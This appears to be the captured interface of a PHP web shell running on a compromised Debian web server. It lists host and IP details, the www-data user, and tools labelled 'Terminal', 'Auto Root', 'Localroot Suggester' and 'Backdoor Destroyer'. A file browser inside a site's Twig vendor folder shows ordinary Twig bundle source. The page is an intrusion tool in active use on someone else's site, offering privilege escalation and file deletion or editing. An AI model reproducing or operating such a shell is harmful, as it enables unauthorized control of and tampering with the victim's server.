Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.117
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
vendor /
twig /
extra-bundle /
Delete
Unzip
Name
Size
Permission
Date
Action
DependencyInjection
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Resources
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
Extensions.php
4.09
KB
-rwxrwxr-x
2026-02-07 08:07
LICENSE
1.04
KB
-rwxrwxr-x
2026-02-07 08:07
LeagueCommonMarkConverterFactory.php
962
B
-rwxrwxr-x
2026-02-07 08:07
MissingExtensionSuggestor.php
1.29
KB
-rwxrwxr-x
2026-02-07 08:07
README.md
206
B
-rwxrwxr-x
2026-02-07 08:07
TwigExtraBundle.php
1.07
KB
-rwxrwxr-x
2026-02-07 08:07
composer.json
1.18
KB
-rwxrwxr-x
2026-02-07 08:07
Save
Rename
<?php /* * This file is part of Twig. * * (c) Fabien Potencier * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Twig\Extra\TwigExtraBundle; use Symfony\Component\DependencyInjection\ContainerBuilder; use Symfony\Component\HttpKernel\Bundle\Bundle; use Symfony\Component\HttpKernel\KernelInterface; use Twig\Extra\TwigExtraBundle\DependencyInjection\Compiler\MissingExtensionSuggestorPass; if (method_exists(KernelInterface::class, 'getShareDir')) { class TwigExtraBundle extends Bundle { public function build(ContainerBuilder $container): void { parent::build($container); $container->addCompilerPass(new MissingExtensionSuggestorPass()); } } } else { class TwigExtraBundle extends Bundle { /** @return void */ public function build(ContainerBuilder $container) { parent::build($container); $container->addCompilerPass(new MissingExtensionSuggestorPass()); } } }